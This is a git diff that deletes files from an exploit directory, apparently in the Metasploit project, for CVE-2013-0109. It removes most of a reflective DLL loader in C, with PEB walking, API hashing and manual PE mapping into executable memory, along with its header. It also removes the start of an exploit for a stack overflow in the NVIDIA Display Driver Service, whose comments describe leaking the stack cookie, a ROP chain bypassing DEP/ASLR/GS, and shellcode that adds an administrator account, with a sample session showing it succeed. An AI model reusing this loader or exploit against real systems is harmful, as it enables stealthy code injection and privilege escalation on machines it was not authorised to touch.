- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef WIN_X64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_X86 - uiBaseAddress = __readfsdword( 0x30 ); -#else WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... 
- do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - 
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index 
into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. 
- uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + 
((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... 
- - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. 
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... 
- *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. 
- return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
deleted file mode 100644
index 3797879e47..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
+++ /dev/null
@@ -1,203 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-
-#include "ReflectiveDLLInjection.h"
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH 0x6A4ABC5B
-#define NTDLLDLL_HASH 0x3CFA685D
-
-#define LOADLIBRARYA_HASH 0xEC0E4E8E
-#define GETPROCADDRESS_HASH 0x7C0DFCAA
-#define VIRTUALALLOC_HASH 0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
-
-#define IMAGE_REL_BASED_ARM_MOV32A 5
-#define IMAGE_REL_BASED_ARM_MOV32T 7
-
-#define ARM_MOV_MASK (DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
-#define ARM_MOVW 0xF2400000
-#define ARM_MOVT 0xF2C00000
-
-#define HASH_KEY 13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
- return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD hash( char * c )
-{
- register DWORD h = 0;
- do
- {
- h = ror( h );
- h += *c;
- } while( *++c );
-
- return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
- USHORT Length;
- USHORT MaximumLength;
- PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) )
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
- //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STR FullDllName;
- UNICODE_STR BaseDllName;
- ULONG Flags;
- SHORT LoadCount;
- SHORT TlsIndex;
- LIST_ENTRY HashTableEntry;
- ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
- DWORD dwLength;
- DWORD dwInitialized;
- LPVOID lpSsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
- struct _PEB_FREE_BLOCK * pNext;
- DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
- BYTE bInheritedAddressSpace;
- BYTE bReadImageFileExecOptions;
- BYTE bBeingDebugged;
- BYTE bSpareBool;
- LPVOID lpMutant;
- LPVOID lpImageBaseAddress;
- PPEB_LDR_DATA pLdr;
- LPVOID lpProcessParameters;
- LPVOID lpSubSystemData;
- LPVOID lpProcessHeap;
- PRTL_CRITICAL_SECTION pFastPebLock;
- LPVOID lpFastPebLockRoutine;
- LPVOID lpFastPebUnlockRoutine;
- DWORD dwEnvironmentUpdateCount;
- LPVOID lpKernelCallbackTable;
- DWORD dwSystemReserved;
- DWORD dwAtlThunkSListPtr32;
- PPEB_FREE_BLOCK pFreeList;
- DWORD dwTlsExpansionCounter;
- LPVOID lpTlsBitmap;
- DWORD dwTlsBitmapBits[2];
- LPVOID lpReadOnlySharedMemoryBase;
- LPVOID lpReadOnlySharedMemoryHeap;
- LPVOID lpReadOnlyStaticServerData;
- LPVOID lpAnsiCodePageData;
- LPVOID lpOemCodePageData;
- LPVOID lpUnicodeCaseTableData;
- DWORD dwNumberOfProcessors;
- DWORD dwNtGlobalFlag;
- LARGE_INTEGER liCriticalSectionTimeout;
- DWORD dwHeapSegmentReserve;
- DWORD dwHeapSegmentCommit;
- DWORD 
dwHeapDeCommitTotalFreeThreshold;
- DWORD dwHeapDeCommitFreeBlockThreshold;
- DWORD dwNumberOfHeaps;
- DWORD dwMaximumNumberOfHeaps;
- LPVOID lpProcessHeaps;
- LPVOID lpGdiSharedHandleTable;
- LPVOID lpProcessStarterHelper;
- DWORD dwGdiDCAttributeList;
- LPVOID lpLoaderLock;
- DWORD dwOSMajorVersion;
- DWORD dwOSMinorVersion;
- WORD wOSBuildNumber;
- WORD wOSCSDVersion;
- DWORD dwOSPlatformId;
- DWORD dwImageSubsystem;
- DWORD dwImageSubsystemMajorVersion;
- DWORD dwImageSubsystemMinorVersion;
- DWORD dwImageProcessAffinityMask;
- DWORD dwGdiHandleBuffer[34];
- LPVOID lpPostProcessInitRoutine;
- LPVOID lpTlsExpansionBitmap;
- DWORD dwTlsExpansionBitmapBits[32];
- DWORD dwSessionId;
- ULARGE_INTEGER liAppCompatFlags;
- ULARGE_INTEGER liAppCompatFlagsUser;
- LPVOID lppShimData;
- LPVOID lpAppCompatInfo;
- UNICODE_STR usCSDVersion;
- LPVOID lpActivationContextData;
- LPVOID lpProcessAssemblyStorageMap;
- LPVOID lpSystemDefaultActivationContextData;
- LPVOID lpSystemAssemblyStorageMap;
- DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
- WORD offset:12;
- WORD type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp b/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
deleted file mode 100644
index d97f113401..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
+++ /dev/null
@@ -1,537 +0,0 @@ -/* - -NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 -- Bypass DEP + ASLR + /GS + CoE -============================================================= -(@peterwintrsmith) - - ** Initial release 25/12/12 - ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks - @seanderegge! - -Hey all! - -Here is an interesting exploit for a stack buffer overflow in the NVidia -Display Driver Service. The service listens on a named pipe (\pipe\nsvr) -which has a NULL DACL configured, which should mean that any logged on user -or remote user in a domain context (Windows firewall/file sharing -permitting) should be able to exploit this vulnerability. - -The buffer overflow occurs as a result of a bad memmove operation, with the -stack layout effectively looking like this: - -[locals] -[received-data] -[response-buf] -[stack cookie] -[return address] -[arg space] -[etc] - -The memmove copies data from the received-data buffer into the response-buf -buffer, unchecked. It is possible to control the offset from which the copy -starts in the received-data buffer by embedding a variable length string - -which forms part of the protocol message being crafted - as well as the -number of bytes copied into the response buffer. - -The amount of data sent back over the named pipe is related to the number -of bytes copied rather than the maximum number of bytes that the buffer is -able to safely contain, so it is possible to leak stack data by copying -from the end of the received-data buffer, through the response-buf buffer -(which is zeroed first time round, and second time round contains whatever -was in it beforehand), right to the end of the stack frame (including stack -cookie and return address). - -As the entire block of data copied is sent back, the stack cookie and -nvvsvc.exe base can be determined using the aforementioned process. 
The -stack is then trashed, but the function servicing pipe messages won't -return until the final message has been received, so it doesn't matter too -much. - -It is then possible to exploit the bug by sending two further packets of -data: One containing the leaked stack cookie and a ROP chain dynamically -generated using offsets from the leaked nvvsvc.exe base (which simply fills -the response-buf buffer when this data is echoed back) and a second packet -which contains enough data to trigger an overwrite if data is copied from -the start of the received-data buffer into the response-buf (including the -data we primed the latter to contain - stack cookie and ROP chain). - -Allowing the function to then return leads to execution of our ROP chain, -and our strategically placed Metasploit net user /add shellcode! We get -continuation of execution for free because the process spins up a thread -to handle each new connection, and there are no deadlocks etc. - -I've included two ROP chains, one which works against the nvvsvc.exe -running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers -from the Dell site, and one which works against the latest version of the -drivers for the same card, from: -http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m -http://www.geforce.co.uk/drivers/results/54709 - -Hope you find this interesting - it's a fun bug to play with! - -- Sample Session - - - -C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators -Alias name administrators -Comment Administrators have complete and unrestricted access to the computer/domain - -Members - -------------------------------------------------------------------------------- -Administrator -Peter -The command completed successfully. 
- - -C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 - ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** - [@peterwintrsmith] - - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - - - Action 1 of 9: - CONNECT - - Action 2 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 3 of 9: - SERVER => CLIENT - Read 16504 (0x4078) characters from pipe - - Action 4 of 9: Building exploit ... - => Stack cookie 0xe2e2893340d4: - => nvvsvc.exe base 0x13fb90000: - - Action 5 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 6 of 9: - SERVER => CLIENT - Read 16384 (0x4000) characters from pipe - - Action 7 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 8 of 9: - SERVER => CLIENT - Read 16896 (0x4200) characters from pipe - - Action 9 of 9: - DISCONNECT - -C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators -Alias name administrators -Comment Administrators have complete and unrestricted access to the computer/domain - -Members - -------------------------------------------------------------------------------- -Administrator -Peter -r00t -The command completed successfully. 
